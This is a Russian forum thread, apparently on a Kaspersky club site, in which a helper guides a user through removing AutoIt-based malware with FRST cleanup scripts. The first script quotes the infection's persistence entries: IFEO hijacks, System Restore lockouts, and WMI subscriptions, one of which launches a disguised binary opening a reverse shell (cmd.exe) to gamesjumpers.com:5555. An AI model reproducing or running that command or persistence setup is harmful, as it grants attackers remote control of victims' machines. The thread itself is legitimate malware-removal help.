Перейти к содержанию

Рекомендуемые сообщения

Опубликовано

Доброго времени суток. Autoit v3 Script вирус подгружает систему на процентов 25. Открыть его расположение невозможно. При полноэкранном режиме в играх вылетает на мгновение командная строка и сразу закрывается.

Addition_03-10-2024 23.41.20.txt FRST_03-10-2024 23.41.20.txt

Опубликовано (изменено)

Все логи необходимы по правилам.

«Порядок оформления запроса о помощи».

-------------------

по очистке в FRST выполните скрипт:

 

 

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда FRST будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу с перезагрузкой системы

 

Start::
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore: [DisableConfig] Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR] Ограничение <==== ВНИМАНИЕ
IFEO\MicrosoftEdgeUpdate.exe: [Debugger] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
IFEO\svchost.exe: [GlobalFlag] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
2024-09-13 09:22 - 2024-09-13 09:22 - 000000000 _RSHD C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
2024-09-13 09:22 - 2024-09-13 09:22 - 000000000 ____D C:\ProgramData\NUL..
2024-09-13 09:22 - 2024-09-13 09:22 - 000000000 ____D C:\ProgramData\AUX..
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"pers\"",Filter="__EventFilter.Name=\"pers\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nut\"",Filter="__EventFilter.Name=\"nut\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"per\"",Filter="__EventFilter.Name=\"per\"::
WMI:subscription\__EventFilter->nut::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->per::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->pers::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->nut::[CommandLineTemplate => C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers.com 5555 -e cmd.exe]
WMI:subscription\CommandLineEventConsumer->per::[CommandLineTemplate => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat][ExecutablePath => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat]
WMI:subscription\CommandLineEventConsumer->pers::[CommandLineTemplate => C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId.dll]
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\Users\cross\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\cross\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\desktop.ini:WinDeviceId [64]
Reboot::
End::

после перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Изменено пользователем safety
Опубликовано (изменено)

Для вашей системы Windows 10 Pro Версия 22H2

по данной ссылке

скачайте соответствующие твики (reg файлы) для исправления работы служб:

BITS

dosvc

UsoSvc

WaaSMedicSvc

wuauserv

Далее, выполните по отдельности каждый твик от имени Администратора и перегрузите систему.

 

Далее необходимо очистить скриптом в FRST нежелательные службы, оставшиеся после вирусной активности

 

Start::
S3 BITS_bkp; C:\WINDOWS\System32\qmgr.dll [1481728 2024-05-16] (Microsoft Windows -> Microsoft Corporation)
S2 UsoSvc_bkp; C:\WINDOWS\system32\usosvc.dll [573952 2024-09-11] (Microsoft Windows -> Microsoft Corporation)
S3 WaaSMedicSvc_bkp; C:\WINDOWS\System32\WaaSMedicSvc.dll [427520 2024-09-11] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\WINDOWS\system32\wuaueng.dll [3431936 2024-08-15] (Microsoft Windows -> Microsoft Corporation)
Reboot::
End::

После перезагрузки проверяем работу системы, напишите по результату, решены были проблемы, или что еще осталось.

+ добавьте новые логи FRST для контроля.

Изменено пользователем safety
Опубликовано (изменено)

Хорошо,

Эту строку еще надо дочистить в FRST без перезагрузки:

 

Start::
S2 dosvc_bkp; C:\WINDOWS\system32\dosvc.dll [1533952 2024-08-15] (Microsoft Windows -> Microsoft Corporation)
End::

+

завершающие шаги:

 

    Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива.
    Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
    Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    Прикрепите этот файл к своему следующему сообщению.

 

Изменено пользователем safety
Опубликовано

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в ТурциюАрмениюСочиКамбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".

Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • kiruxashafr
      Автор kiruxashafr
      такая вот проблема слышу ноут гудит захожу в диспетчер задач там само собой все тихо, а вот в приложухе амд показывает видюха надрывается и процессор нагружен, как только открываю диспетчер все утихает, как закрываю опять гудит!

      очень сильно прошу помочь могущественных работников данного форума, когда то очень помогли! спасибо
      ноут honor magicbook 16 plus винда 11
    • per4ik
      Автор per4ik
      заметил повышение температуры на процессоре, и нагрузку на видеокарте, открыл диспетчер задач и заметил процесс label.exe. Снял задачу и резко упала температура с нагрузкой.
      скорее всего майнер, антивирус не видит, подскажите как можно решить проблему.
      Прикрепляю логи
      CollectionLog-2025.09.20-20.29.zip
    • LaVVINa
      Автор LaVVINa
      Добрый день! 
      Либо через расширения для хрома, либо через игры с торрента занесла вирус. Неймингуется Trojan.Packed2.49814
      Через безопасный режим виндовс не убирается, возвращается.
      Помогите, пожалуйста, убрать его 🙏
      CollectionLog-2025.09.19-21.18.zip
    • volanchics
      Автор volanchics
      Сегодня Касперский выдал такое сообщение: Обнаружена активная вредоносная программа HEUR:Trojan.Win32.Miner.pef
      Всплывает вот такое окно. Нажимаю Вылечить, пишет - удалено. Но через пару секунд всё повторяется. А чуть позже стало появляться еще и вот такое сообщение.. Как убрать этот вирус?


    • deamonlal
      Автор deamonlal
      Добрый день! Столкнулся с подозрительным поведением компьютера. При не использовании в течении 10 минут, начинает громко работать куллер процессора (когда экран монитора погас). Предполагаю, что это майнер. Думаю, он появился после скачивания и установки одной из пиратских игр. Прошу у вас помощи в его удалении!
      Логи из AutoLogger'а прикрепляю.

      Заранее спасибо!
      CollectionLog-2025.09.18-13.18.zip
×
×
  • Создать...